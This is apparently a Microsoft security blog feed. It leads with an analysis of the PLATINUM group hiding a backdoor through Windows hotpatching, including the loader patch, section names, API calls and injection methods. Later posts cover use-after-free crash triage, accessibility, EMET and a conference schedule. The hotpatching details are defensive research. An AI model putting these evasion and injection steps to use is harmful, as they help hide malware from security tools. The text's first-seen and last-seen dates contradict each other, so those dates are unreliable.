Uncovering these kinds of techniques is true detective work, and finding them in the wild is a challenge, but with the wealth of anonymized information we can utilize from over 1 billion Windows devices, a broad spectrum of services, Microsoft’s intelligent security graph as well as advanced analytics and machine algorithms to surface suspicious behaviors, Microsoft is in the best position to do so.

Digging up the nugget

Through our advanced and persistent hunting, we discovered PLATINUM is using hotpatching as a technique to attempt to cloak a backdoor they use. Using hotpatching in the malicious context has been theorized [1], [2], but has not been observed in the wild before. Finding such techniques is a focus of the Microsoft APT hunter team, and we want to provide some brief insights on how the team dug up this PLATINUM “nugget”.

In the first part of this methodology, a hunter carves out some rough data sets from existing information and data that can be further analyzed. This could be based on rough heuristics, such as looking for files with high entropy, that were first observed recently, and that are confined to a geographic region that fits the profile of the activity group being investigated.

Carving the data still yields large data sets that can’t be manually analyzed, and advanced threat analytics can help in sorting through the data for meaningful information in the second step. Graph inferences through the Microsoft intelligent security graph can bubble pieces of information to the top of the queue for a hunter to choose from. In the PLATINUM investigation, we identified 31 files.

Lastly, the hunter works directly with the resulting set. During this stage of the PLATINUM investigation, a hunter found a file with unusual string (“.hotp1”). The hunter’s experience and intuition drove him to dig deeper. In this case, that further investigation led us to the malicious use of hotpatching by this activity group and the “nugget” was uncovered.

Deconstructing the attack

So what is hotpatching? Hotpatching is a previously supported OS feature for installing updates without having to reboot or restart a process. It requires administrator-level permissions, and at a high level, a hotpatcher can transparently apply patches to executables and DLLs in actively running processes.

Using hotpatching in a malicious context is a technique that can be used to avoid being detected, as many antimalware solutions monitor non-system processes for regular injection methods, such as CreateRemoteThread. Hotpatching originally shipped with Windows Server 2003 and was used to ship 10 patches to Windows Server 2003. Windows 10, our most secure operating system ever, is not susceptible to this and many other techniques and attack vectors.

What this means in practical terms is that PLATINUM was able to abuse this feature to hide their backdoor from the behavioral sensors of many host security products. We first observed a sample employing the hotpatching technique on a machine in Malaysia. This allowed PLATINUM to gain persistent access to the networks of companies it targeted and victimized over a long period without being detected.

Thwarting the bad guys

The Microsoft APT hunter team actively tracks activity groups like PLATINUM. We proactively identify these groups and the techniques they use and work to address vulnerabilities and implement security mitigations. The team builds detections and threat intelligence that are utilized by many of our products and services. Beta users of Windows Defender ATP can take advantage of this additional layer of protection and intelligence for a broad set of activity groups.

We’ve included a more technical exploration of  our research and detection of the hotpatching technique in the remainder of this blog.

You can also see a closer look at the PLATINUM activity group in our report PLATINUM: Targeted attacks in South and Southeast Asia. Windows Defender Advanced Threat Protection beta and preview users can also find the report, along with other APT activity group reports, in the Windows Defender ATP portal.

We continue to dig for PLATINUM.

The Windows Defender Advanced Threat Hunting Team

Hotpatching – a case study

We first observed the sample (Sample1) that is capable of utilizing hotpatching on a machine in Malaysia (which matches the general target profile of PLATINUM) on January 28, 2016 . The portable executable (PE) timestamp, which can be arbitrarily set by the adversary, dates back to August 9, 2015, while the unpacked version contains a PE timestamp for November 26, 2015.

It is a DLL that runs as a service and serves as an injector component of a backdoor. Interestingly, this sample not only supported the hotpatching technique described in this post, but was able to apply more common code-injection techniques, including the following, into common Windows processes (primarily targeting winlogon.exe, lsass.exe and svchost.exe):

  • CreateRemoteThread
  • NtQueueApcThread to run an APC in a thread in the target process
  • RtlCreatUserThread
  • NtCreateThreadEx

Hotpatching technique

For hotpatching, the sample goes through the following steps:

  1. It patches the loader with a proper hotpatch to treat injected DLLs with execute page permissions. This step is required for DLLs loaded from memory (in an attempt to further conceal the malicious code).
  2. The backdoor is injected into svchost using the hotpatch API.

Patching the loader is done by creating a section named “\knowndlls\mstbl.dll”. This DLL does not reside on-disk, but is rather treated as a cached DLL by the session manager.

It then proceeds to write a PE file within that section. The PE file will have one section (“.hotp1 “) with the hotpatch header structure. This structure contains all the information necessary to perform the patching of the function “ntdll!LdrpMapViewOfSection” used by the loader, such that the loader will treat created sections as PAGE_EXECUTE_READWRITE instead of PAGE_READWRITE. The patch is successfully applied by invoking NtSetSystemInformation.

The malware builds the information describing the first patch

Figure 1: The malware builds the information describing the first patch


The highlighted "push 4" is patched to "push 0x40", meaning that the parameter for the following API call NtMapViewOfSection is changed from PAGE_READWRITE to PAGE_EXECUTE_READWRITE.

Figure 2: The highlighted “push 4” is patched to “push 0x40”, meaning that the parameter for the following API call NtMapViewOfSection is changed from PAGE_READWRITE to PAGE_EXECUTE_READWRITE.

Now that the memory permission issue has been solved, the injector can proceed with injecting the malicious DLL into svchost. Again, it creates a (now executable) section named “knowndlls\fgrps.dll” and invokes NtSetSystemInformation, causing the final payload to be loaded and executed within the target process (svchost).

Trying to hide the payload using hotpatching also falls in line with the last functional insights we have on the sample. It seems to have an expiry date of January 15, 2017 – at that point in time, the DLL will no longer perform the injection, but rather execute another PLATINUM implant:

C:\program files\Windows Journal\Templates\Cpl\jnwmon.exe –ua

This implant may be related to an uninstall routine. Note that we observed the sample last on the machine on September 3, 2015, which may indicate PLATINUM pulled the trigger earlier.





Building a More Accessible Web Platform, 21 Apr 2016 22:00:38 +0000 February the Edge team shared the roadmap for empowering all Microsoft Edge customers through accessibility and inclusive design. Today, we’re excited to share more about Microsoft Edge’s native support for the modern UI Automation accessibility framework, coming with the Windows 10 Anniversary Update. UI Automation enables Windows applications to provide programmatic information about their user interface to assistive technology products such as screen readers, and enables a comprehensive ecosystem. Read more about the updates on the Microsoft Edge Developer Blog.

April 2016 Security Update Release, 12 Apr 2016 10:00:43 +0000 we released security updates to provide additional protections against malicious attackers. As a best practice, we encourage customers to apply security updates as soon as they are released.

More information about this month’s security updates and advisories can be found in the Security TechNet Library.


Improvements to Narrator in Windows 10, 11 Apr 2016 21:50:03 +0000 February, Jenny Lay-Flurrie, chief accessibility officer for Microsoft, reaffirmed our company-wide commitment to accessibility and outlined our guiding principles and goals to improve accessibility across our products, services and websites. In support of this commitment, the Windows team would like to share progress the team has made with respect to Narrator since the release of Windows 10 last summer.

What We’ve Learned

Since the release of Windows 10 we have heard lots of feedback through our Windows Insider program as well as through direct conversations with users of Assistive Technology (AT). This feedback has aligned to four key areas:

  1. Improve the accessibility our new browser, Microsoft Edge.
  2. Improve support for common email scenarios with Windows Mail.
  3. Improve Narrator by increasing performance, reliability and usability.
  4. Improve the accessibility of Windows 10 experiences like the Start menu, the lock screen, Cortana, Store, Music, Videos and more.

The Edge and Mail teams have previously provided updates on their progress and priorities, which you can read about on their blogs. This post will focus on the work we are doing in support of improving Narrator. And in the coming months we will be sharing more about the improved accessibility of other Windows 10 experiences.

Improvements to Narrator

Today we are excited to share progress on improvements to Narrator focused on three main areas; performance, reliable reading and usability. Some of these updates can already be seen in the current pre-release builds available through the Windows Insider program, which you can join by visiting Others will be included in upcoming builds made available through Windows Insider.
Improvements to expect in Narrator include:

Better Performance

  • Improved performance when navigating the start menu.
  • Significant performance improvements when typing

More Reliable Reading

  • We have improved things like table navigation resulting in a better reading and editing experience in apps like Windows Mail and Word


  • Narrator will now read suggested results in apps like Cortana and Edge as well as suggested e-mail addresses in Outlook.
  • Keyboard commands in Narrator are now more familiar to users of other screen readers.
  • Some keyboard interactions have been simplified and updated to ensure better ergonomics, making them easier to type.

The following video gives a quick walkthrough of some of the improved keyboard interactions:

Other Investments

While much of our work aligns with our commitment to deliver a great in-box screen reading experience with Narrator, we also have longstanding relationships with our 3rd party screen reading partners. We firmly believe that the ecosystem of screen reading applications from vendors like Freedom Scientific, NV Access, AI Squared, Dolphin and Serotek will continue to deliver the most comprehensive set of access solutions for the blind and visually impaired. We are working together through regular technical discussions and collaboration to ensure they can support our primary Windows 10 apps and experiences.

We are also implementing a change in Narrator to help you chose the best possible experience when browsing the web. We recognize that some assistive technologies like Narrator may work better with Internet Explorer. With the April 2016 update for Windows 10, the first time you run Narrator you will be presented with the option to set Internet Explorer as the default web browser.

And finally, in addition to the work on Narrator, our documentation team has been working hard to update the resources available to those who are learning how to use Narrator. We are looking forward to providing improved and more complete documentation at the next public update for Windows 10.

Looking Forward

Microsoft is committed to making Windows 10 a great experience for all users and over the next few months we will continue to work on the performance, reliability and usability of tools designed for people with disabilities. We will also keep working on new features, like additional languages for Narrator, and will continue to post regular updates about our progress.

If you’re interested in providing help or suggestions, we would love to get your feedback via the Windows Insider Program or for technical support, contact the Microsoft Disability Answer Desk.

Seeing AI: New Technology Research to Support the Blind and Visually Impaired Community, 07 Apr 2016 18:23:01 +0000’s mission is to empower every person and every organization on the planet to achieve more, which includes creating and delivering technology for people of all abilities. As a part of this effort, last week at the Microsoft Build Conference, we debuted a new research project in development – Seeing AI – aimed at helping people who are visually impaired or blind to understand more about who and what is around them. Seeing AI will use computer vision, image and speech recognition, natural language processing and machine learning from Microsoft’s Cognitive Services and Office Lens to help describe a person’s surroundings, read text, answer questions and even identify emotions on people’s faces.

Seeing AI demo concept video

Seeing AI might be used either as a mobile app or via smart glasses from Pivothead. Although Seeing AI would not replace mobility aids such as guide dogs and canes, it will add another layer of information that could further enable people of all abilities to use technology in a more personal and enjoyable way.

This project was born out of last year’s //oneweek Hackathon, an event where Microsoft employees work together and try to make wild ideas a reality. Although Seeing AI is still in the development phase and not currently available, there has been tremendous progress on this initiative in a relatively short amount of time and we will definitely provide updates when we have more information to share.

We’re so excited to be working across the company and with others around the world to explore new opportunities that can help people of all abilities to achieve more. As always, we love your continued feedback and ideas as we keep working together to push the boundaries of what technology can do to empower every person on the planet.

Microsoft Bounty Programs Announce Expansion – Bounty for Microsoft OneDrive, 18 Mar 2016 00:19:38 +0000 Microsoft, we continue to add new properties to our security bug bounty programs to help keep our customer’s secure. Today, I’m pleased to announce the addition of Microsoft OneDrive to the Microsoft Online Services Bug Bounty Program.

This addition further incentivizes security researchers to report service vulnerabilities to Microsoft. As part of the Microsoft Online Services Bug Bounty Program, the payouts will range from $500 – $15,000 USD.

Join us at the Microsoft Booth at CanSecWest 2016 in Vancouver, Canada to learn more about Microsoft OneDrive and the bounty programs. You can find the updated terms here. Send your submissions to

Happy Hunting,

Jason Shirk

Secure Development Blog, 17 Mar 2016 17:52:30 +0000 more »]]>We’re proud to announce Secure Development at Microsoft, our developer focused security blog at Microsoft. The blog was created to inform developers of new security tools, services, open source projects and best development practices in order to help instill a security mindset across the development community and enable cross collaboration amongst its members.

Blog posts will be written by Microsoft engineers to give developers the right level of technical depth in order to get them up and running with integrating security assurance into their projects right away. We’ll cross reference their posts to make sure anyone following this blog can also check out the technical side of what we do.

Check them out!

Announcing Microsoft Sessions at CSUN Conference, 16 Mar 2016 18:00:23 +0000 is pleased to be participating next week at the 31st Annual International Technology and Persons with Disabilities Conference (CSUN) in San Diego. On Wednesday March 23rd, we are hosting a number of educational sessions onsite to share information about the accessibility of our latest products including Windows 10 and Office 365, as well as to inspire dialog with some of our engineers and product managers. Below is our full schedule of session topics. If you are attending CSUN this year, we encourage you to join us for any or all of these talks. We look forward to connecting with you in San Diego.

Location: Pier Room, 3rd Floor of Harbor Tower

Session Schedule for Mar 23, 2016:

9:00 – 9:50am – Getting to know Windows 10
10:00 – 10:50am – Accessibility in Windows 10
11:00 -11:40am – What’s New for Accessibility in Edge – Panel Discussion with Edge Accessibility Product Managers on plans and progress
11:40am -1:20pm – Break for Lunch
1:20 – 2:10pm – Accessibility Enhancements in Office 365 – Panel Discussion with Microsoft Accessibility Product Managers on plans and progress
2:20 – 2:45pm – Accessibility Enhancements in Office 365 – Demonstrations by Microsoft Accessibility Experts with a variety of devices and assistive technologies
2.45 – 3:10pm – Learning Tools for OneNote – Overview of new, free tools that ease reading, writing and comprehension for everyone, including people with dyslexia
3:20 – 5:20pm – Round table discussions with Office 365 Accessibility Team – Bring your questions and suggestions!

March 2016 Security Update Release, 09 Mar 2016 10:00:08 +0000 we released security updates to provide additional protections against malicious attackers. As a best practice, we encourage customers to apply security updates as soon as they are released.

More information about this month’s security updates can be found in the Security TechNet Library.


Making Windows 10 and Office 365 more accessible: Our path forward, 24 Feb 2016 15:06:06 +0000 is top of mind at Microsoft and two recent blog posts reflect this mindset. The first shares our corporate roadmap to improve accessibility and the second details progress and plans for accessibility in Office 365. As Chief Accessibility Officer Jenny Lay-Flurrie outlined, Microsoft has established three guiding principles on accessibility – transparency, accountability and inclusion.

The recent blogs, both the overarching corporate blog and the Office 365 blog , are aligned to our commitment to transparency. Our plans are aimed at delivering an experience that enables not just access, but also productivity. Within Windows 10, we will be working to improve commonly used features with showcase Windows experiences, improving browsing and reading experiences on Edge, providing a better screen-reader experience for Windows 10 mail and working on Narrator. For Office 365, we are focusing on making it easier to author accessible content, easier to use Office 365 with screen readers, enhancing the experience with apps in High Contrast Mode, introducing new tools that are beneficial to people with dyslexia and enabling everyone to use our applications in more intuitive ways.

There’s more in the blog posts, and I encourage you to check out the full details. We are committed to keeping our customers updated on our progress with future updates on this blog, and we look forward to getting your feedback and what matters most to you as we move forward.

Corporate Blog:
Office 365 Blog:

February 2016 Security Update Release Summary, 09 Feb 2016 10:00:00 +0000 we released security updates to provide additional protections against malicious attackers. As a best practice, we encourage customers to apply security updates as soon as they are released.

More information about this month’s security updates and advisories can be found in the Security TechNet Library. 


Enhanced Mitigation Experience Toolkit (EMET) version 5.5 is now available, 02 Feb 2016 17:17:28 +0000 Enhanced Mitigation Experience Toolkit (EMET) benefits enterprises and all computer users by helping to protect against security threats and breaches that can disrupt businesses and daily lives. It does this by anticipating, diverting, terminating, blocking, or otherwise invalidating the most common actions and techniques adversaries might use to compromise a computer. In this way, EMET can help protect your computer systems even from new and undiscovered threats before they are formally addressed by security updates and antimalware software.

Today we are pleased to announce the release of EMET 5.5, which includes the following new functionality and updates:

  • Windows 10 compatibility
  • Improved configuration of various mitigations via GPO
  • Improved writing of the mitigations to the registry, making it easier to leverage existing tools to manage EMET mitigations via GPO 
  • EAF/EAF+ pseudo-mitigation performance improvements
  • Support for untrusted fonts mitigation in Windows 10

Mitigations in Windows 10

EMET was released in 2009 as a standalone tool to help enterprises better protect their Windows clients by providing an interface to manage built-in Windows security mitigations while also providing additional features meant to disrupt known attack vectors used by prevalent malware. Since that time,  we have made substantial improvements to the security of the browser and the core OS. With Windows 10 we have implemented many features and mitigations that can make EMET unnecessary on devices running Windows 10. EMET is most useful to help protect down-level systems, legacy applications, and to provide Control Flow Guard (CFG) protection for 3rd party software that may not yet be recompiled using CFG.

Some of the Windows 10 features that provide equivalent (or better) mitigations than EMET are:

Device Guard: Device Guard is a combination of enterprise-related hardware and software security features that, when configured together, will lock a device down so that it can only run trusted applications. Device Guard provides hardware-based zero day protection for all software running in kernel mode, thus protecting the device and Device Guard itself from tampering, and app control policies that prevent untrusted software from running on the device.

Control Flow Guard (CFG): As developers compile new apps, CFG analyzes and discovers every location that any indirect-call instruction can reach.  It builds that knowledge into the binaries (in extra data structures – the ones mentioned in a dumpbin/loadconfig display).  It also injects a check, before every indirect-call in your code, that ensures the target is one of those expected, safe locations.  If that check fails at runtime, the operating system closes the program.

AppLocker: AppLocker is an application control feature introduced in Windows 7 that helps prevent the execution of unwanted and unknown applications within an organization's network while providing security, operational, and compliance benefits. AppLocker can be used in isolation or in combination with Device Guard to control which apps from trusted publishers are allowed to run.

For more information on Windows 10 security features please review the Windows 10 Security overview whitepaper on TechNet.

EMET 5.5 and Edge

Given the advanced technologies used to protect Microsoft Edge, including industry leading sandboxing, compiler, and memory management techniques, EMET 5.5 mitigations do not apply to Edge.


For support using EMET 5.5, please visit


The EMET team

Triaging the exploitability of IE/EDGE crashes, 12 Jan 2016 14:27:00 +0000 


Both Internet Explorer (IE) and Edge have seen significant changes in order to help protect customers from security threats. This work has featured a number of mitigations that together have not only rendered classes of vulnerabilities not-exploitable, but also dramatically raised the cost for attackers to develop a working exploit.

Because of these changes, determining the exploitability of crashes has become increasingly complicated, as the effect of these mitigations must be taken into account during analysis. We have received a number of requests from the security community for clarification on how these mitigations affect exploitability.  To ensure that only valid issues are submitted, we thought it may be useful to offer some guidance.


Use after free mitigations

Use-after-free (UAF) is a common type of vulnerability in modern object-orientated software. They are caused when an instance of an object is freed while a pointer to the object is still kept by the program. Since the object instance has been freed, this pointer is dangling, pointing to unmapped memory. Such a vulnerability is exploitable when the unmapped memory is controllable by an attacker, and will be used when the dangling pointer is later dereferenced by the program. We can split UAF vulnerabilities into 3 classes based upon where the dangling pointer is stored: the stack, heap, and the registers.

We have developed two primary mitigations to protect against UAFs:

  • Memory Protector (MP) [IE10 and below]

MP is designed to protect objects against UAFs where the reference is stored on the stack, or in a register.

  • MemGC [Edge & IE11]

MemGC is a new replacement for MP, currently enabled on Edge and IE11. Protected objects are only freed when no references exist on the stack, heap or registers, offering complete coverage. 


Exploitability & Servicing

MemGC [Edge & IE11]

  • We consider UAFs that are addressed by MemGC strongly mitigated, and will not issue a security update for them.
  • The only exception for this are rare cases where zero writing the object leads to an exploitable state, although we have yet to see an occurrence of this.

Memory Protector [IE10 and below]

  • We consider stack and register based UAFs strongly mitigated and will not issue a security update for them, except in the circumstances explained below.
  • Heap reference based UAFs are not mitigated by MP, and so will still be addressed via a security update.


Triaging crashes

Memory protector

Memory protector (MP) is a mitigation first introduced in July 2014 initially for all supported versions of Internet Explorer, but now only applies to IE 10 and below. It is designed to mitigate a subset of use-after-free vulnerabilities, due to dangling pointers stored on the stack or the registers. At a high level, it works as follows:

  1. When delete is called on an object instance, its contents is zero wrote, and it is placed in a queue. Once the queue has reached a threshold size, we then begin the process of seeing if it is safe to free each object instance in the queue.
  2. To test to see if it is safe to free an object instance, we scan both the registers and all pointer aligned stack entries to see if there exists a pointer to the object. If no pointer is found then the object is freed, otherwise the object is kept in the queue.

Part (1) of the algorithm delays the potential freeing of the object to a later point in time, is controllable by an attacker, and as such is not considered a security mitigation.

To make it easier to determine the exploitability of these issues, MP has a mode called “Stress Mode”. Under this mode the delayed free component (1) of MP is disabled: stack/register scanning happens on every free, rather than when the queue has reached a threshold length. It can be enabled with the registry key:

HKLM:/Software/Microsoft/Internet Explorer/Main/Feature Control/FEATURE_MEMPROTECT_MODE/iexplore.exe DWORD 2

(note that this key, and “Stress Mode” are only applicable to MP, not MemGC).

Example crash

With the delayed free component of MP now disabled by forcing the object instance to be freed at the earliest possible instant, we can now concentrate on determining exploitability, based on Part (2), as shown by an illustrative example below:

In this case, we have a use-after-free vulnerability causing a near-null dereference. Tracing backwards, we can see that the value of eax was set a few instructions previously:

If we look at this object in memory, we see that has been zero wrote, and by checking the PageHeap End Magic we can see that this heap chunk is still allocated under Stress Mode:

Now we need to see if there are any stack references to this object instance, starting at the call frame when delete was called. This can be completed using windbg scripting: for example, scanning for references to an object with base address stored in ebx with size 0x30:


Checking stack reference locations with MP

In this case, we find a single reference to the object instance on the stack. With this information we must now check to see which call frame contains this reference.

Here, we show an example call stack at the point when the object is deleted:

If there is a reference to an object instance on the stack or registers, then MP will never free the object instance. Thus, if between the point delete is first called in frame_2 until the point when we crash with a near null dereference in frame_5 there is always a stack reference, the object instance cannot be freed and reallocated/controlled by an attacker.

In this example, the reference we found by scanning the stack (at 0x1024ae9c) is stored in frame_8. Since this reference is present all of the time between the freeing point in frame_2 and the crashing point in frame_8, we consider this case as not-exploitable since it is strongly mitigated by MP.

Two other main situations can also occur:

  1. If (for example) the stack reference was in frame_3 rather than frame_8, then there is a period between the freeing of the object and the crashing point when there are no stack references. This case may be exploitable since if the code path between these points can be slightly altered to force another call to delete, we will be left with an exploitable situation.
  2. When running under stress mode, the crash may now occur on a freed block since the delayed free component is disabled (usually due to the reference being stored on the heap). Under this circumstance, the case would be generally exploitable.


MemGC is a new replacement for MP, currently available in Edge and all supported versions of IE11, and mitigates use-after-free vulnerabilities in a similar fashion as MP. However, it also offers additional protection by scanning the heap for references to protected object types, as well as the stack and registers. MemGC will zero write upon free and will delay the actual free until garbage collection is triggered and no references to the freed object are found.

Just like MP, mitigated use-after-free vulnerabilities will most likely result in a near-null pointer dereferences or occasionally in no crash at all. If you suspect that a near-null pointer dereference is actually a mitigated use-after-free vulnerability you can verify this with the following steps:

  • Find the position where the near-null value is read, determining the base pointer of the object:

If we dump the object, we can see that it has been zero wrote as before:

  • Trace back and find the allocation call stack for this chunk, using the base pointer that was found in the first step. If the object is allocated with edgehtml!MemoryProtection::HeapAlloc() or edgehtml!MemoryProtection::HeapAllocClear() it means that the object is tracked by MemGC e.g.

Similarly, when the object is freed, it will be via edgehtml!MemoryProtection::HeapFree() e.g.

To double check that the issue is successfully mitigated, we can scan for references to the object on both the heap and stack.

For scanning the stack, we can use the same technique as described in the Memory Protector section. We can then use the same criteria as described above to determine exploitability; if there exists a stack reference between the freeing point and crashing point, we consider it strongly mitigated by MemGC.

When scanning the heap, we use a similar method, by first scanning the heap for references with values between the base pointer and basepointer+object_size of the object we are interested in. If any references are found, we then just need to check to see what objects they are associated with. If the object containing the reference is also tracked by MemGC (i.e. allocated via HeapAlloc() or HeapAllocClear()), then MemGC will not free the object we are interested in, so we consider it strongly mitigated by MemGC.

In this example, if we use the stack scanning command from above, we see that there is a reference on the stack preventing the object from being freed between the deletion and crashing points, making it successfully mitigated by MemGC.


In conclusion these new mitigations dramatically enhance the security by making sets of use-after-free vulnerabilities non-exploitable. When triaging issues in both IE & Edge, the behavior of these mitigations needs to be taken into account in order to determine the exploitability of these issues.


We would like to thank the following people for their contribution to this post:

Chris Betz, Crispin Cowan, John Hazen, Gavin Thomas, Marek Zmyslowski, Matt Miller, Mechele Gruhn, Michael Plucinski, Nicolas Joly, Phil Cupp, Sermet Iskin, Shawn Richardson and Suha Can

Stephen Fleming & Richard van Eeden.  MSRC Engineering, Vulnerabilities & Mitigations Team.

January 2016 Security Update Release Summary, 12 Jan 2016 10:14:40 +0000 we released security updates to provide additional protections against malicious attackers. As a best practice, we encourage customers to apply security updates as soon as they are released.

More information about this month’s security updates and advisories can be found in the Security TechNet Library. 


BlueHat v15 Announces Schedule and Registration, 18 Nov 2015 13:14:00 +0000 we inch closer to the 15th BlueHat Security Conference, we are happy to announce the lineup of speakers and topics for this event.  This year will continue with a solid speaker and topic selection that engage engineers, executives, and invited guests to discuss and tackle some of the hardest problems facing the industry today.  Through this conference, our engineering teams get deep technical information and education on the latest threats from proven industry experts.

BlueHat is set for Tuesday, January 12th through Wednesday, January 13th at Microsoft’s Redmond campus.  The first day will set the stage of the threat environment and what is impacting customers today.  The second day splits into four simultaneous tracks (two in the morning and two in afternoon) focusing on protecting customers and defense strategy, pivoting to help customers, software/service development, and attacks/exploits in the wild.

External invites have been sent and registration is now open for BlueHat v15.  We look forward to another great conference.


Tuesday, January 12th, 2016 | General Audience


9:00-9:50 AM| Ofir Arkin | Intel
Keynote:  Security in a World Out of Our Control

The traditional security models are failing as they become obsolete in a world where the environment and technology are constantly changing and advancing.The need to allow anywhere anytime access (Mobility) to enterprise resources from any user (Collaboration), and any device (BYOD), has challenged the mare existence of the fixed perimeter and the traditional defense mechanisms. In a world where IT is losing control over devices, users and even it’s own infrastructure a new security model, that takes into account these new realities, must be put in place.


10:00-10:50 AM | Nick Carr and Matthew Dunwoody | Mandiant           
No Easy Breach: Challenges and Lessons from One of Madiant's Most Demanding Investigations

Every IR presents unique challenges. But – when an attacker uses PowerShell, WMI, Kerberos attacks, novel persistence mechanisms, seemingly unlimited C2 infrastructure and half-a-dozen rapidly evolving malware families across a 100k node network to compromise the environment at a rate of 10 systems per day – the cumulative challenges can become overwhelming. This talk will showcase the obstacles overcome during one of the largest and most advanced breaches Mandiant has ever responded to, the novel investigative techniques employed, and the lessons learned that allowed us to help remediate it.

11:00-11:50 AM | Shawn Loveland |Microsoft 
The Business of Cybercrime

Just as the PC/computer/mobile device ecosystem has grown over the decades, so has the cybercrime industry, which today is more organized and motivated than at any time in history.  Blackhat cybercrime is a form of malicious online behavior motivated by profit and a predictable ROI.  Treating Blackhat cybercrime as a purely technological problem, makes mitigation difficult, costly, and ineffective.  By understanding the attacker’s Tools, Techniques, Motivations, and Business Models, we can understand how our products, services, and users are, and will be, victimized by Blackhat Cybercriminals.


1:00-1:50 PM |Daniel Edwards | Microsoft        
HoneyPots & Deception – What is happening to our Azure customers?

The theme of the talk this year will be about my experiments in running a honeypot in Azure, what I learned, how the information can be used to improve protection and a call to action.  The PowerPoint is a very basic outline meant to convey the theme of the talk.  I just haven’t had a chance to create all the diagrams but I already have all the data (and continue to collect additional data every day) that I am talking too.  The word document is a sample of the analysis that I will be incorporating.

2:00-2:50 PM | Alex Weinert and Dana Kaufman| Microsoft
A Year in the Trenches with Microsoft Identity Protection team

Between Microsoft account, Microsoft’s consumer system which supports Outlook, Xbox, OneDrive, and more; and Azure Active Directory, which supports virtually all enterprise identity deployments, Microsoft’s Identity team supports more than 2B identities in every market and services over 14B logins every day. The Identity Protection team is responsible for ensuring that access is granted only to account owners, and that those account owners are not fraudsters. In this session, we’ll provide an overview of the protection systems in play, how we see fraudsters adapting to those systems, and industry trends in a world where the high stakes attacks meet high tech adaptive countermeasures. We’ll punctuate the talk with a few scary stories front lines, and our forecast for the future of identity protection.

3:00-3:50 PM |Jonathan Birch | Microsoft          
Unintended Authentication

Unintended authentication to untrusted services is a common but largely ignored problem in Windows applications. In this talk, I explain how this type of vulnerability occurs and why its potential and current exploitation create a risk that application developers should work immediately to mitigate. To give reference examples, I discuss two cases where this type of vulnerability occurred and was fixed in Microsoft Office. Finally, I demonstrate how to test for and fix unintended authentication problems and best practices that can be used to prevent them from being introduced into a product.

4:00-4:50 PM |Matt Graeber | Veris Group        
Windows Management Instrumentation – The Omnipresent Attack and Defense Platform

A resourceful attacker seeking to maximize his or her compromise/effort ratio will naturally target any omnipresent technology present in a homogeneous environment. Windows Management Instrumentation (WMI) is one such technology that is present and listening on every Windows operating system dating back to Windows 95. WMI is a powerful remote administration technology used to get/set system information, execute commands, and perform actions in response to events. While it is a well-known and heavily used technology by diehard Microsoft sysadmins, attackers (i.e. diehard unintended sysadmins) find such built-in technology enticing, especially those who wish to maintain a minimal footprint in their target environment. In reality, targeted and criminal actors are making heavy use of WMI in the wild and defenders need to be informed of its capabilities both from an offensive and defensive perspective. This talk aims to inform the audience of the basics of WMI, in the wild attacks, theoretical attack scenarios, and how defenders can leverage the WMI eventing system against an attacker.

Wednesday, January 13th, 2016 | General Audience 

TRACK 1 – DEVELOPMENT                         

9:00-9:50 AM | Lee Holmes |Microsoft
Attackers Hunt Sysadmins. It's time to fight back

What do the NSA, APT groups, and run-of-the-mill attackers have in common? They. Hunt. Sysadmins. After all, what’s a better way to compromise an entire infrastructure than to target the folks with complete and unconstrained access to it? It’s time to fight back. In this talk, we introduce PowerShell Just Enough Administration, a powerful platform capability that lets you add role-based access controls to your existing PowerShell-based remote management infrastructure.

10:00-10:50 AM | Laura Bell | SafeStack              
Protecting our people (The Awkward Border)

People are problematic when it comes to security. We all know and laugh about the ease with which we can lie, cheat and steal from those around us whilst stubbornly refusing to admit that the same scams would probably work on us too. A culture of fear and negative consequences spanning decades has given us a workforce that is not only scared of being attacked, but scared of saying something if they see a threat or do something wrong.

So how do we change this? Can we enable, empower and engage _all_ of our people to protect themselves and those around them? More importantly can we do this without destroying privacy or putting those people at risk? This isn't a sales pitch. This isn't a miracle cure. This is the story of trying to protect our people and the difficult road to achieving this.

11:00-11:25 AM | Shawn Hernan | Microsoft
Factor-and-a-half Authentication

Many traditional techniques for protecting the stored representation of passwords derive their security by making the password verification operation expensive. For example, a server may hash a password many times as a way to slow down brute-force attacks against an offline copy of the password database. In such a scheme, acceptable password security may result in unacceptably poor login-time performance. Memory-intensive functions like scrypt may not scale well on a server that has to support a large number of simultaneous login attempts.  Multi-factor authentication schemes based provide protection against many of the common problems that plague reusable passwords. Unfortunately, adoption rates for MFA are low in general, and many of the systems are expensive or suffer from usability issues.  This talk proposes an authentication system “factor-and-a-half authentication,” to address some of these problems. Factor-and-a-half authentication consists of “something you know,” and “something you create,” along with initial setup and verification protocols and policy management between clients and server.

11:30-11:55 AM | Scott Longheyer | Microsoft 
Network Defense- Isolation Enforcement

Some things are meant to be shared, some are not. From dedicated to software-defined networks, we discuss modern solutions to enforce network isolation in extremely dynamic, often exposed, single or multi-tenant hosting environments. The tools are getting better, let’s wield them. Network certifications are not required to attend.

TRACK 2 – Pivoting to Help Customers                                     

1:00-1:50 PM | Amit Hilbuch |Microsoft             
Early Detection of Fraud Storms in the Cloud

Cloud computing resources are sometimes hijacked for fraudulent use. While some fraudulent use manifests as a small-scale resource consumption, a more serious type of fraud is that of fraud storms, which are events of large-scale fraudulent use. These events begin when fraudulent users discover new vulnerabilities in the sign up process, which they then exploit in mass. The ability to perform early detection of these storms is a critical component of any cloud-based public computing system.

In this work we analyze telemetry data from Microsoft Azure to detect fraud storms and raise early alerts on sudden increases in fraudulent use. The use of machine learning approaches to identify such anomalous events involves two inherent challenges: the scarcity of these events, and at the same time, the high frequency of anomalous events in cloud systems. We compare the performance of a supervised approach to the one achieved by an unsupervised, multivariate anomaly detection framework. We further evaluate the system performance taking into account practical considerations of robust-ness in the presence of missing values, and minimization of the model’s data collection period. This work describes the system, as well as the underlying machine learning algorithms applied. A beta version of the system is deployed and used to continuously control fraud levels in Azure.

2:00-2:50 PM | Christiaan Beek | Intel Security
There’s A Pot of Gold at The End of the Ransomware Rainbow

Ransomware is one of the threats we have seen rising over the past few years with a huge resurfacing in 2014. Mostly Windows platform but also Linux, Mobile and OSX Operating systems are getting targeted for these campaigns.  In this presentation, we will start with an overview of the different crypto-ransomwares we have seen in the past couple of year combined with some of the technical developments in the industry that assisted in making this business-model very lucrative. We continue with some examples of in-depth analysis of behavior patterns we discovered in certain families that helped us identifying them and classifying them. Besides the malware itself we will highlight some insights around how the actors in general are operating, the infrastructure they build-up, the financial infrastructure, the profit and connections with other cybercrime operations.

 3:00-3:50 PM | Jasika Bawa, Costas Boulis, and Roman Porter| Microsoft           
Advancing SmartScreen To Disrupt The Exploit Kit Economy

